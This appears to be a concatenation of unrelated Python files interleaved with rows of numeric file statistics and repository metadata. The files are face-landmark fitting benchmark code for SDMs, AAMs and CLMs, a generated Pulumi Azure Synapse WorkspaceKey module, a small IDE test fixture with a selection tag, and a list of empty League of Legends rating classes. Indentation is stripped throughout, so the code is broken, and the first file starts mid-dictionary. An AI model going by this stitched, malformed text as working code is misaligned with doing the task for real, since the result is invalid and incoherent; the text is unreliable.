'downscale': 1.01,
'noise_std': 0.08,
'patch_shape': (16, 16),
'n_perturbations': 15,
}
fitting_options = {
'error_type': error_type
}
# run experiment
training_images = load_database(training_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
sdm = sdm_build_benchmark(training_images,
training_options=training_options,
verbose=verbose)
# import bounding boxes
bboxes_list = import_bounding_boxes(fitting_bboxes_path)
# for all fittings, we crop to 0.5
fitting_images = load_database(fitting_db_path,
db_loading_options=db_loading_options,
bounding_boxes=bboxes_list,
verbose=verbose)
fitting_results = sdm_fit_benchmark(fitting_images, sdm,
fitting_options=fitting_options,
verbose=verbose)
# convert results
max_error_bin = 0.05
bins_error_step = 0.005
final_error_curve, initial_error_curve, error_bins = \
convert_fitting_results_to_ced(fitting_results,
max_error_bin=max_error_bin,
bins_error_step=bins_error_step,
error_type=error_type)
# plot results
if plot:
title = "SDMs using default (sparse hogs)".format(
training_options['features'].__name__)
y_axis = [final_error_curve, initial_error_curve]
legend = ['Fitting', 'Initialization']
plot_fitting_curves(error_bins, y_axis, title, new_figure=True,
x_limit=max_error_bin, legend_entries=legend,
line_colour=['r', 'b'],
marker_face_colour=['r', 'b'],
marker_style=['o', 'x'])
return fitting_results, final_error_curve, initial_error_curve, error_bins
def aam_params_combinations_noise(training_db_path, fitting_db_path,
n_experiments=1, features=None,
scaled_shape_models=None,
n_shape=None,
n_appearance=None, noise_std=None,
rotation=None, verbose=False, plot=False):
# parse input
if features is None:
features = [igo] * n_experiments
elif len(features) is not n_experiments:
raise ValueError("features has wrong length")
if scaled_shape_models is None:
scaled_shape_models = [True] * n_experiments
elif len(scaled_shape_models) is not n_experiments:
raise ValueError("scaled_shape_models has wrong length")
if n_shape is None:
n_shape = [[3, 6, 12]] * n_experiments
elif len(n_shape) is not n_experiments:
raise ValueError("n_shape has wrong length")
if n_appearance is None:
n_appearance = [50] * n_experiments
elif len(n_appearance) is not n_experiments:
raise ValueError("n_appearance has wrong length")
if noise_std is None:
noise_std = [0.04] * n_experiments
elif len(noise_std) is not n_experiments:
raise ValueError("noise_std has wrong length")
if rotation is None:
rotation = [False] * n_experiments
elif len(rotation) is not n_experiments:
raise ValueError("rotation has wrong length")
# load images
db_loading_options = {'crop_proportion': 0.1,
'convert_to_grey': True
}
training_images = load_database(training_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
fitting_images = load_database(fitting_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
# run experiments
max_error_bin = 0.05
bins_error_step = 0.005
curves_to_plot = []
all_fitting_results = []
for i in range(n_experiments):
if verbose:
print("\nEXPERIMENT {}/{}:".format(i + 1, n_experiments))
print("- features: {}\n- scaled_shape_models: {}\n"
"- n_shape: {}\n"
"- n_appearance: {}\n- noise_std: {}\n"
"- rotation: {}".format(
features[i], scaled_shape_models[i],
n_shape[i], n_appearance[i], noise_std[i], rotation[i]))
# predefined option dictionaries
error_type = 'me_norm'
training_options = {'group': 'PTS',
'features': igo,
'transform': DifferentiablePiecewiseAffine,
'trilist': ibug_face_68_trimesh,
'normalization_diagonal': None,
'n_levels': 3,
'downscale': 1.1,
'scaled_shape_models': True,
'max_shape_components': 25,
'max_appearance_components': 250,
'boundary': 3
}
fitting_options = {'algorithm': AIC,
'md_transform': OrthoMDTransform,
'n_shape': [3, 6, 12],
'n_appearance': 50,
'max_iters': 50,
'error_type': error_type
}
pertrub_options = {'noise_std': 0.04,
'rotation': False}
# training
training_options['features'] = features[i]
training_options['scaled_shape_models'] = scaled_shape_models[i]
aam = aam_build_benchmark(training_images,
training_options=training_options,
verbose=verbose)
# fitting
fitting_options['n_shape'] = n_shape[i]
fitting_options['n_appearance'] = n_appearance[i]
pertrub_options['noise_std'] = noise_std[i]
pertrub_options['rotation'] = rotation[i]
fitting_results = aam_fit_benchmark(fitting_images, aam,
perturb_options=pertrub_options,
fitting_options=fitting_options,
verbose=verbose)
all_fitting_results.append(fitting_results)
# convert results
final_error_curve, initial_error_curve, error_bins = \
convert_fitting_results_to_ced(
fitting_results, max_error_bin=max_error_bin,
bins_error_step=bins_error_step,
error_type=error_type)
curves_to_plot.append(final_error_curve)
if i == n_experiments - 1:
curves_to_plot.append(initial_error_curve)
# plot results
if plot:
title = "AAMs using Alternating IC"
colour_list = ['r', 'b', 'g', 'y', 'c'] * n_experiments
marker_list = ['o', 'x', 'v', 'd'] * n_experiments
plot_fitting_curves(error_bins, curves_to_plot, title, new_figure=True,
x_limit=max_error_bin, line_colour=colour_list,
marker_face_colour=colour_list,
marker_style=marker_list)
return all_fitting_results
def clm_params_combinations_noise(training_db_path, fitting_db_path,
n_experiments=1, classifier_trainers=None,
patch_shape=None, features=None,
scaled_shape_models=None, n_shape=None,
noise_std=None, rotation=None, verbose=False,
plot=False):
# parse input
if classifier_trainers is None:
classifier_trainers = [linear_svm_lr] * n_experiments
elif len(classifier_trainers) is not n_experiments:
raise ValueError("classifier_trainers has wrong length")
if patch_shape is None:
patch_shape = [(5, 5)] * n_experiments
elif len(patch_shape) is not n_experiments:
raise ValueError("patch_shape has wrong length")
if features is None:
features = [igo] * n_experiments
elif len(features) is not n_experiments:
raise ValueError("features has wrong length")
if scaled_shape_models is None:
scaled_shape_models = [True] * n_experiments
elif len(scaled_shape_models) is not n_experiments:
raise ValueError("scaled_shape_models has wrong length")
if n_shape is None:
n_shape = [[3, 6, 12]] * n_experiments
elif len(n_shape) is not n_experiments:
raise ValueError("n_shape has wrong length")
if noise_std is None:
noise_std = [0.04] * n_experiments
elif len(noise_std) is not n_experiments:
raise ValueError("noise_std has wrong length")
if rotation is None:
rotation = [False] * n_experiments
elif len(rotation) is not n_experiments:
raise ValueError("rotation has wrong length")
# load images
db_loading_options = {'crop_proportion': 0.4,
'convert_to_grey': True
}
training_images = load_database(training_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
fitting_images = load_database(fitting_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
# run experiments
max_error_bin = 0.05
bins_error_step = 0.005
curves_to_plot = []
all_fitting_results = []
for i in range(n_experiments):
if verbose:
print("\nEXPERIMENT {}/{}:".format(i + 1, n_experiments))
print("- classifiers: {}\n- patch_shape: {}\n"
"- features: {}\n- scaled_shape_models: {}\n"
"- n_shape: {}\n"
"- noise_std: {}\n- rotation: {}".format(
classifier_trainers[i], patch_shape[i], features[i],
scaled_shape_models[i], n_shape[i],
noise_std[i], rotation[i]))
# predefined option dictionaries
error_type = 'me_norm'
training_options = {'group': 'PTS',
'classifier_trainers': linear_svm_lr,
'patch_shape': (5, 5),
'features': sparse_hog,
'normalization_diagonal': None,
'n_levels': 3,
'downscale': 1.1,
'scaled_shape_models': False,
'max_shape_components': None,
'boundary': 3
}
fitting_options = {'algorithm': RLMS,
'pdm_transform': OrthoPDM,
'n_shape': [3, 6, 12],
'max_iters': 50,
'error_type': error_type
}
perturb_options = {'noise_std': 0.01,
'rotation': False}
# training
training_options['classifier_trainers'] = classifier_trainers[i]
training_options['patch_shape'] = patch_shape[i]
training_options['features'] = features[i]
training_options['scaled_shape_models'] = scaled_shape_models[i]
clm = clm_build_benchmark(training_images,
training_options=training_options,
verbose=verbose)
# fitting
fitting_options['n_shape'] = n_shape[i]
perturb_options['noise_std'] = noise_std[i]
perturb_options['rotation'] = rotation[i]
fitting_results = clm_fit_benchmark(fitting_images, clm,
perturb_options=perturb_options,
fitting_options=fitting_options,
verbose=verbose)
all_fitting_results.append(fitting_results)
# convert results
final_error_curve, initial_error_curve, error_bins = \
convert_fitting_results_to_ced(
fitting_results, max_error_bin=max_error_bin,
bins_error_step=bins_error_step,
error_type=error_type)
curves_to_plot.append(final_error_curve)
if i == n_experiments - 1:
curves_to_plot.append(initial_error_curve)
# plot results
if plot:
title = "CLMs using RLMS"
colour_list = ['r', 'b', 'g', 'y', 'c'] * n_experiments
marker_list = ['o', 'x', 'v', 'd'] * n_experiments
plot_fitting_curves(error_bins, curves_to_plot, title, new_figure=True,
x_limit=max_error_bin, line_colour=colour_list,
marker_face_colour=colour_list,
marker_style=marker_list)
return all_fitting_results
| 43.848718 | 79 | 0.527455 | 3,282 | 34,202 | 5.105119 | 0.058806 | 0.044763 | 0.042972 | 0.0302 | 0.933691 | 0.924799 | 0.910654 | 0.902477 | 0.898418 | 0.880215 | 0 | 0.013999 | 0.39638 | 34,202 | 779 | 80 | 43.905006 | 0.797578 | 0.029998 | 0 | 0.826019 | 0 | 0 | 0.107286 | 0.009753 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014107 | false | 0 | 0.020376 | 0 | 0.048589 | 0.00627 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
37959c4763801fd3b2d0574049dda7b7f037ae25 | 36 | py | Python | networks/__init__.py | chenpan0615/FCCDN_pytorch | 0589988a62b031d678358c7462b2f236c0f17555 | [
"MIT"
] | 18 | 2021-08-11T07:04:19.000Z | 2022-03-29T02:08:32.000Z | networks/__init__.py | chenpan0615/FCCDN_pytorch | 0589988a62b031d678358c7462b2f236c0f17555 | [
"MIT"
] | 5 | 2021-10-02T03:18:26.000Z | 2022-03-29T02:59:48.000Z | networks/__init__.py | chenpan0615/FCCDN_pytorch | 0589988a62b031d678358c7462b2f236c0f17555 | [
"MIT"
] | 5 | 2021-11-18T14:54:10.000Z | 2022-03-29T02:08:34.000Z | from .GenerateNet import GenerateNet | 36 | 36 | 0.888889 | 4 | 36 | 8 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 36 | 1 | 36 | 36 | 0.969697 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
37bc78283f980d2bcb555def50a5cafef2f72354 | 13,662 | py | Python | sdk/python/pulumi_azure/synapse/workspace_key.py | ScriptBox99/pulumi-azure | 1b8c6d5479ccabc39094741eac25a8ca44c8833a | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/synapse/workspace_key.py | ScriptBox99/pulumi-azure | 1b8c6d5479ccabc39094741eac25a8ca44c8833a | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/synapse/workspace_key.py | ScriptBox99/pulumi-azure | 1b8c6d5479ccabc39094741eac25a8ca44c8833a | [
"ECL-2.0",
"Apache-2.0"
] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['WorkspaceKeyArgs', 'WorkspaceKey']
@pulumi.input_type
class WorkspaceKeyArgs:
def __init__(__self__, *,
active: pulumi.Input[bool],
synapse_workspace_id: pulumi.Input[str],
cusomter_managed_key_name: Optional[pulumi.Input[str]] = None,
customer_managed_key_name: Optional[pulumi.Input[str]] = None,
customer_managed_key_versionless_id: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a WorkspaceKey resource.
"""
pulumi.set(__self__, "active", active)
pulumi.set(__self__, "synapse_workspace_id", synapse_workspace_id)
if cusomter_managed_key_name is not None:
warnings.warn("""As this property name contained a typo originally, please switch to using 'customer_managed_key_name' instead.""", DeprecationWarning)
pulumi.log.warn("""cusomter_managed_key_name is deprecated: As this property name contained a typo originally, please switch to using 'customer_managed_key_name' instead.""")
if cusomter_managed_key_name is not None:
pulumi.set(__self__, "cusomter_managed_key_name", cusomter_managed_key_name)
if customer_managed_key_name is not None:
pulumi.set(__self__, "customer_managed_key_name", customer_managed_key_name)
if customer_managed_key_versionless_id is not None:
pulumi.set(__self__, "customer_managed_key_versionless_id", customer_managed_key_versionless_id)
@property
@pulumi.getter
def active(self) -> pulumi.Input[bool]:
return pulumi.get(self, "active")
@active.setter
def active(self, value: pulumi.Input[bool]):
pulumi.set(self, "active", value)
@property
@pulumi.getter(name="synapseWorkspaceId")
def synapse_workspace_id(self) -> pulumi.Input[str]:
return pulumi.get(self, "synapse_workspace_id")
@synapse_workspace_id.setter
def synapse_workspace_id(self, value: pulumi.Input[str]):
pulumi.set(self, "synapse_workspace_id", value)
@property
@pulumi.getter(name="cusomterManagedKeyName")
def cusomter_managed_key_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "cusomter_managed_key_name")
@cusomter_managed_key_name.setter
def cusomter_managed_key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cusomter_managed_key_name", value)
@property
@pulumi.getter(name="customerManagedKeyName")
def customer_managed_key_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "customer_managed_key_name")
@customer_managed_key_name.setter
def customer_managed_key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "customer_managed_key_name", value)
@property
@pulumi.getter(name="customerManagedKeyVersionlessId")
def customer_managed_key_versionless_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "customer_managed_key_versionless_id")
@customer_managed_key_versionless_id.setter
def customer_managed_key_versionless_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "customer_managed_key_versionless_id", value)
@pulumi.input_type
class _WorkspaceKeyState:
def __init__(__self__, *,
active: Optional[pulumi.Input[bool]] = None,
cusomter_managed_key_name: Optional[pulumi.Input[str]] = None,
customer_managed_key_name: Optional[pulumi.Input[str]] = None,
customer_managed_key_versionless_id: Optional[pulumi.Input[str]] = None,
synapse_workspace_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering WorkspaceKey resources.
"""
if active is not None:
pulumi.set(__self__, "active", active)
if cusomter_managed_key_name is not None:
warnings.warn("""As this property name contained a typo originally, please switch to using 'customer_managed_key_name' instead.""", DeprecationWarning)
pulumi.log.warn("""cusomter_managed_key_name is deprecated: As this property name contained a typo originally, please switch to using 'customer_managed_key_name' instead.""")
if cusomter_managed_key_name is not None:
pulumi.set(__self__, "cusomter_managed_key_name", cusomter_managed_key_name)
if customer_managed_key_name is not None:
pulumi.set(__self__, "customer_managed_key_name", customer_managed_key_name)
if customer_managed_key_versionless_id is not None:
pulumi.set(__self__, "customer_managed_key_versionless_id", customer_managed_key_versionless_id)
if synapse_workspace_id is not None:
pulumi.set(__self__, "synapse_workspace_id", synapse_workspace_id)
@property
@pulumi.getter
def active(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "active")
@active.setter
def active(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "active", value)
@property
@pulumi.getter(name="cusomterManagedKeyName")
def cusomter_managed_key_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "cusomter_managed_key_name")
@cusomter_managed_key_name.setter
def cusomter_managed_key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cusomter_managed_key_name", value)
@property
@pulumi.getter(name="customerManagedKeyName")
def customer_managed_key_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "customer_managed_key_name")
@customer_managed_key_name.setter
def customer_managed_key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "customer_managed_key_name", value)
@property
@pulumi.getter(name="customerManagedKeyVersionlessId")
def customer_managed_key_versionless_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "customer_managed_key_versionless_id")
@customer_managed_key_versionless_id.setter
def customer_managed_key_versionless_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "customer_managed_key_versionless_id", value)
@property
@pulumi.getter(name="synapseWorkspaceId")
def synapse_workspace_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "synapse_workspace_id")
@synapse_workspace_id.setter
def synapse_workspace_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "synapse_workspace_id", value)
class WorkspaceKey(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
active: Optional[pulumi.Input[bool]] = None,
cusomter_managed_key_name: Optional[pulumi.Input[str]] = None,
customer_managed_key_name: Optional[pulumi.Input[str]] = None,
customer_managed_key_versionless_id: Optional[pulumi.Input[str]] = None,
synapse_workspace_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Create a WorkspaceKey resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: WorkspaceKeyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a WorkspaceKey resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param WorkspaceKeyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(WorkspaceKeyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
active: Optional[pulumi.Input[bool]] = None,
cusomter_managed_key_name: Optional[pulumi.Input[str]] = None,
customer_managed_key_name: Optional[pulumi.Input[str]] = None,
customer_managed_key_versionless_id: Optional[pulumi.Input[str]] = None,
synapse_workspace_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = WorkspaceKeyArgs.__new__(WorkspaceKeyArgs)
if active is None and not opts.urn:
raise TypeError("Missing required property 'active'")
__props__.__dict__["active"] = active
if cusomter_managed_key_name is not None and not opts.urn:
warnings.warn("""As this property name contained a typo originally, please switch to using 'customer_managed_key_name' instead.""", DeprecationWarning)
pulumi.log.warn("""cusomter_managed_key_name is deprecated: As this property name contained a typo originally, please switch to using 'customer_managed_key_name' instead.""")
__props__.__dict__["cusomter_managed_key_name"] = cusomter_managed_key_name
__props__.__dict__["customer_managed_key_name"] = customer_managed_key_name
__props__.__dict__["customer_managed_key_versionless_id"] = customer_managed_key_versionless_id
if synapse_workspace_id is None and not opts.urn:
raise TypeError("Missing required property 'synapse_workspace_id'")
__props__.__dict__["synapse_workspace_id"] = synapse_workspace_id
super(WorkspaceKey, __self__).__init__(
'azure:synapse/workspaceKey:WorkspaceKey',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
active: Optional[pulumi.Input[bool]] = None,
cusomter_managed_key_name: Optional[pulumi.Input[str]] = None,
customer_managed_key_name: Optional[pulumi.Input[str]] = None,
customer_managed_key_versionless_id: Optional[pulumi.Input[str]] = None,
synapse_workspace_id: Optional[pulumi.Input[str]] = None) -> 'WorkspaceKey':
"""
Get an existing WorkspaceKey resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _WorkspaceKeyState.__new__(_WorkspaceKeyState)
__props__.__dict__["active"] = active
__props__.__dict__["cusomter_managed_key_name"] = cusomter_managed_key_name
__props__.__dict__["customer_managed_key_name"] = customer_managed_key_name
__props__.__dict__["customer_managed_key_versionless_id"] = customer_managed_key_versionless_id
__props__.__dict__["synapse_workspace_id"] = synapse_workspace_id
return WorkspaceKey(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def active(self) -> pulumi.Output[bool]:
return pulumi.get(self, "active")
@property
@pulumi.getter(name="cusomterManagedKeyName")
def cusomter_managed_key_name(self) -> pulumi.Output[str]:
return pulumi.get(self, "cusomter_managed_key_name")
@property
@pulumi.getter(name="customerManagedKeyName")
def customer_managed_key_name(self) -> pulumi.Output[str]:
return pulumi.get(self, "customer_managed_key_name")
@property
@pulumi.getter(name="customerManagedKeyVersionlessId")
def customer_managed_key_versionless_id(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "customer_managed_key_versionless_id")
@property
@pulumi.getter(name="synapseWorkspaceId")
def synapse_workspace_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "synapse_workspace_id")
| 48.792857 | 190 | 0.694701 | 1,605 | 13,662 | 5.522741 | 0.092835 | 0.104919 | 0.104242 | 0.081904 | 0.80009 | 0.782265 | 0.776512 | 0.75722 | 0.733078 | 0.706679 | 0 | 0.000093 | 0.21278 | 13,662 | 279 | 191 | 48.967742 | 0.824082 | 0.082931 | 0 | 0.699531 | 1 | 0.014085 | 0.192819 | 0.104393 | 0 | 0 | 0 | 0 | 0 | 1 | 0.150235 | false | 0.004695 | 0.023474 | 0.070423 | 0.262911 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
807c1d5498f15e6de8d068bf147332465a66369d | 137 | py | Python | python/testData/override/indent_after.py | teddywest32/intellij-community | e0268d7a1da1d318b441001448cdd3e8929b2f29 | [
"Apache-2.0"
] | null | null | null | python/testData/override/indent_after.py | teddywest32/intellij-community | e0268d7a1da1d318b441001448cdd3e8929b2f29 | [
"Apache-2.0"
] | 11 | 2017-02-27T22:35:32.000Z | 2021-12-24T08:07:40.000Z | python/testData/override/indent_after.py | teddywest32/intellij-community | e0268d7a1da1d318b441001448cdd3e8929b2f29 | [
"Apache-2.0"
] | 1 | 2019-02-06T14:50:03.000Z | 2019-02-06T14:50:03.000Z | class Dialog:
def validate(self): pass
class B(Dialog):
def validate(self):
<selection>Dialog.validate(self)</selection> | 22.833333 | 52 | 0.678832 | 17 | 137 | 5.470588 | 0.470588 | 0.387097 | 0.365591 | 0.451613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.189781 | 137 | 6 | 52 | 22.833333 | 0.837838 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.2 | 0 | null | null | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
80fc0749713257291dc93a80b4688cdadbbb9c01 | 6,959 | py | Python | loldib/getratings/models/NA/na_tahmkench/na_tahmkench_mid.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_tahmkench/na_tahmkench_mid.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_tahmkench/na_tahmkench_mid.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | from getratings.models.ratings import Ratings
class NA_TahmKench_Mid_Aatrox(Ratings):
pass
class NA_TahmKench_Mid_Ahri(Ratings):
pass
class NA_TahmKench_Mid_Akali(Ratings):
pass
class NA_TahmKench_Mid_Alistar(Ratings):
pass
class NA_TahmKench_Mid_Amumu(Ratings):
pass
class NA_TahmKench_Mid_Anivia(Ratings):
pass
class NA_TahmKench_Mid_Annie(Ratings):
pass
class NA_TahmKench_Mid_Ashe(Ratings):
pass
class NA_TahmKench_Mid_AurelionSol(Ratings):
pass
class NA_TahmKench_Mid_Azir(Ratings):
pass
class NA_TahmKench_Mid_Bard(Ratings):
pass
class NA_TahmKench_Mid_Blitzcrank(Ratings):
pass
class NA_TahmKench_Mid_Brand(Ratings):
pass
class NA_TahmKench_Mid_Braum(Ratings):
pass
class NA_TahmKench_Mid_Caitlyn(Ratings):
pass
class NA_TahmKench_Mid_Camille(Ratings):
pass
class NA_TahmKench_Mid_Cassiopeia(Ratings):
pass
class NA_TahmKench_Mid_Chogath(Ratings):
pass
class NA_TahmKench_Mid_Corki(Ratings):
pass
class NA_TahmKench_Mid_Darius(Ratings):
pass
class NA_TahmKench_Mid_Diana(Ratings):
pass
class NA_TahmKench_Mid_Draven(Ratings):
pass
class NA_TahmKench_Mid_DrMundo(Ratings):
pass
class NA_TahmKench_Mid_Ekko(Ratings):
pass
class NA_TahmKench_Mid_Elise(Ratings):
pass
class NA_TahmKench_Mid_Evelynn(Ratings):
pass
class NA_TahmKench_Mid_Ezreal(Ratings):
pass
class NA_TahmKench_Mid_Fiddlesticks(Ratings):
pass
class NA_TahmKench_Mid_Fiora(Ratings):
pass
class NA_TahmKench_Mid_Fizz(Ratings):
pass
class NA_TahmKench_Mid_Galio(Ratings):
pass
class NA_TahmKench_Mid_Gangplank(Ratings):
pass
class NA_TahmKench_Mid_Garen(Ratings):
pass
class NA_TahmKench_Mid_Gnar(Ratings):
pass
class NA_TahmKench_Mid_Gragas(Ratings):
pass
class NA_TahmKench_Mid_Graves(Ratings):
pass
class NA_TahmKench_Mid_Hecarim(Ratings):
pass
class NA_TahmKench_Mid_Heimerdinger(Ratings):
pass
class NA_TahmKench_Mid_Illaoi(Ratings):
pass
class NA_TahmKench_Mid_Irelia(Ratings):
pass
class NA_TahmKench_Mid_Ivern(Ratings):
pass
class NA_TahmKench_Mid_Janna(Ratings):
pass
class NA_TahmKench_Mid_JarvanIV(Ratings):
pass
class NA_TahmKench_Mid_Jax(Ratings):
pass
class NA_TahmKench_Mid_Jayce(Ratings):
pass
class NA_TahmKench_Mid_Jhin(Ratings):
pass
class NA_TahmKench_Mid_Jinx(Ratings):
pass
class NA_TahmKench_Mid_Kalista(Ratings):
pass
class NA_TahmKench_Mid_Karma(Ratings):
pass
class NA_TahmKench_Mid_Karthus(Ratings):
pass
class NA_TahmKench_Mid_Kassadin(Ratings):
pass
class NA_TahmKench_Mid_Katarina(Ratings):
pass
class NA_TahmKench_Mid_Kayle(Ratings):
pass
class NA_TahmKench_Mid_Kayn(Ratings):
pass
class NA_TahmKench_Mid_Kennen(Ratings):
pass
class NA_TahmKench_Mid_Khazix(Ratings):
pass
class NA_TahmKench_Mid_Kindred(Ratings):
pass
class NA_TahmKench_Mid_Kled(Ratings):
pass
class NA_TahmKench_Mid_KogMaw(Ratings):
pass
class NA_TahmKench_Mid_Leblanc(Ratings):
pass
class NA_TahmKench_Mid_LeeSin(Ratings):
pass
class NA_TahmKench_Mid_Leona(Ratings):
pass
class NA_TahmKench_Mid_Lissandra(Ratings):
pass
class NA_TahmKench_Mid_Lucian(Ratings):
pass
class NA_TahmKench_Mid_Lulu(Ratings):
pass
class NA_TahmKench_Mid_Lux(Ratings):
pass
class NA_TahmKench_Mid_Malphite(Ratings):
pass
class NA_TahmKench_Mid_Malzahar(Ratings):
pass
class NA_TahmKench_Mid_Maokai(Ratings):
pass
class NA_TahmKench_Mid_MasterYi(Ratings):
pass
class NA_TahmKench_Mid_MissFortune(Ratings):
pass
class NA_TahmKench_Mid_MonkeyKing(Ratings):
pass
class NA_TahmKench_Mid_Mordekaiser(Ratings):
pass
class NA_TahmKench_Mid_Morgana(Ratings):
pass
class NA_TahmKench_Mid_Nami(Ratings):
pass
class NA_TahmKench_Mid_Nasus(Ratings):
pass
class NA_TahmKench_Mid_Nautilus(Ratings):
pass
class NA_TahmKench_Mid_Nidalee(Ratings):
pass
class NA_TahmKench_Mid_Nocturne(Ratings):
pass
class NA_TahmKench_Mid_Nunu(Ratings):
pass
class NA_TahmKench_Mid_Olaf(Ratings):
pass
class NA_TahmKench_Mid_Orianna(Ratings):
pass
class NA_TahmKench_Mid_Ornn(Ratings):
pass
class NA_TahmKench_Mid_Pantheon(Ratings):
pass
class NA_TahmKench_Mid_Poppy(Ratings):
pass
class NA_TahmKench_Mid_Quinn(Ratings):
pass
class NA_TahmKench_Mid_Rakan(Ratings):
pass
class NA_TahmKench_Mid_Rammus(Ratings):
pass
class NA_TahmKench_Mid_RekSai(Ratings):
pass
class NA_TahmKench_Mid_Renekton(Ratings):
pass
class NA_TahmKench_Mid_Rengar(Ratings):
pass
class NA_TahmKench_Mid_Riven(Ratings):
pass
class NA_TahmKench_Mid_Rumble(Ratings):
pass
class NA_TahmKench_Mid_Ryze(Ratings):
pass
class NA_TahmKench_Mid_Sejuani(Ratings):
pass
class NA_TahmKench_Mid_Shaco(Ratings):
pass
class NA_TahmKench_Mid_Shen(Ratings):
pass
